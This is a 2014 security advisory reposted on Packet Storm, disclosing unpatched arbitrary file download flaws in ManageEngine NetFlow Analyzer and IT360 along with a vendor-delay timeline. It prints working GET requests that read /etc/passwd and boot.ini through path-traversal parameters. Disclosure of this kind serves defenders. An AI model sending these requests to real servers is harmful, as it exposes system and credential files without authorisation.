exploit the possibilities

ManageEngine Netflow Analyzer / IT360 File Download

ManageEngine Netflow Analyzer / IT360 File Download
Posted Dec 1, 2014
Authored by Pedro Ribeiro

ManageEngine Netflow Analyzer and IT360 suffer from an arbitrary file download vulnerability.

tags | exploit, arbitrary
advisories | CVE-2014-5445, CVE-2014-5446
MD5 | 310d724b3820fc0603b09eb7b0dc7fee

ManageEngine Netflow Analyzer / IT360 File Download

Change Mirror Download
Hi,

This is part 9 of the ManageOwnage series. For previous parts see [1].

Today we have yet another 0 day - an arbitrary file download
vulnerability that be exploited unauthenticated in NetFlow Analyzer
and authenticated in IT360.
I'm releasing this as a 0 day because ManageEngine have been making a
fool out of me for 105 days. I have asked them "are you releasing a
fix soon?" at least a couple of times every month to which they always
responded "yes we will release in the next week/month". And then they
don't release the fix nor provide an explanation. See the advisory
timeline below for details.

An Metasploit auxiliary module that exploits this vulnerability has
been submitted to the Metasploit Framework Github repo in [2].

A full copy of the advisory below can be obtained from my repo in [3].

Regards,
Pedro

>> Arbitrary file download in ManageEngine Netflow Analyzer and IT360
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
==========================================================================
Disclosure: 30/11/2014 / Last updated: 30/11/2014

>> Background on the affected product:
"NetFlow Analyzer, a complete traffic analytics tool, leverages flow
technologies to provide real time visibility into the network
bandwidth performance. NetFlow Analyzer, primarily a bandwidth
monitoring tool, has been optimizing thousands of networks across the
World by giving holistic view about their network bandwidth and
traffic patterns. NetFlow Analyzer is a unified solution that
collects, analyzes and reports about what your network bandwidth is
being used for and by whom."

"Managing mission critical business applications is now made easy
through ManageEngine IT360. With agentless monitoring methodology,
monitor your applications, servers and databases with ease. Agentless
monitoring of your business applications enables you high ROI and low
TOC. With integrated network monitoring and bandwidth utilization,
quickly troubleshoot any performance related issue with your network
and assign issues automatically with ITIL based ServiceDesk
integration."

This is being released as a 0-day because ManageEngine have been
twiddling their thumbs (and making a fool out of me) for 105 days. See
timeline below for explanation.


>> Technical details:
Vulnerability: Arbitrary file download
Constraints: unauthenticated in NetFlow; authenticated in IT360
Affected versions: NetFlow v8.6 to v9.9; at least IT360 v10.3 and above

CVE-2014-5445:
GET /netflow/servlet/CSVServlet?schFilePath=/etc/passwd
GET /netflow/servlet/CReportPDFServlet?schFilePath=C:\\boot.ini&pdf=true

CVE-2014-5446
GET /netflow/servlet/DisplayChartPDF?filename=../../../../boot.ini

All 3 servlets can be exploited in both Windows and Linux. A
Metasploit module that exploits CVE-2014-5445 has been released.


>> Fix:
UNFIXED - ManageEngine failed to take action after 105 days.

Timeline of disclosure:
18/08/2014
- Requested contact via ManageEngine Security Response Center.

19/08/2014
- Received contact from the NetFlow Analyzer support team. Responded
with the security advisory above detailing the vulnerabilities.
- Further back and forth explaining the vulnerabilities, how to
exploit them and their impact.

22/08/2014
- Requested information regarding the release date for the fix.
Received response "We do not have a ETA on this, I will check with our
engineering team and update you."

22/09/2014
- Requested information regarding the release date for the fix.
Received response "We expect that the new release will be within the
next couple of weeks".

20/10/2014
- Requested information regarding the release date for the fix.
Received response "Our new release will be happening early by next
week, you can get the update in our NetFlow Analyzer website".
- Asked if they are sure that the fix will be included in the new
release. Received response "yes you are correct, the issue that you
have specified is fixed in new release".

27/10/2014
- NetFlow Analyzer version 10.2 released - still vulnerable.
- Sent an email to ManageEngine asking if they are going to release a
fix soon. Received response "We will release the PPM file of the
upgrade soon, in which we have fixed the Vulnerability you mentioned".

5/11/2014
- Requested information regarding the release date for the fix.
Received response "You can expect the release before this month end".

28/11/2014
- Requested information regarding the release date for the fix.
Received response "The PPM file is in testing phase and will be
released in next Month".
- Asked if they can commit to a date. Received response "the ppm is in
testing phase now, as it is one of the major release, we will not be
able to give an exact date of release".

30/11/2014
- Realised that ManageEngine have been playing me for 105 days, and
immediately released advisory and exploit.


[1]
http://seclists.org/fulldisclosure/2014/Aug/55
http://seclists.org/fulldisclosure/2014/Aug/75
http://seclists.org/fulldisclosure/2014/Aug/88
http://seclists.org/fulldisclosure/2014/Sep/1
http://seclists.org/fulldisclosure/2014/Sep/110
http://seclists.org/fulldisclosure/2014/Nov/12
http://seclists.org/fulldisclosure/2014/Nov/18
http://seclists.org/fulldisclosure/2014/Nov/21

[2]
https://github.com/rapid7/metasploit-framework/pull/4282

[3]
https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_netflow_it360_file_dl.txt

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

December 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    1 Files
  • 2
    Dec 2nd
    16 Files
  • 3
    Dec 3rd
    17 Files
  • 4
    Dec 4th
    23 Files
  • 5
    Dec 5th
    11 Files
  • 6
    Dec 6th
    10 Files
  • 7
    Dec 7th
    1 Files
  • 8
    Dec 8th
    1 Files
  • 9
    Dec 9th
    15 Files
  • 10
    Dec 10th
    30 Files
  • 11
    Dec 11th
    8 Files
  • 12
    Dec 12th
    20 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close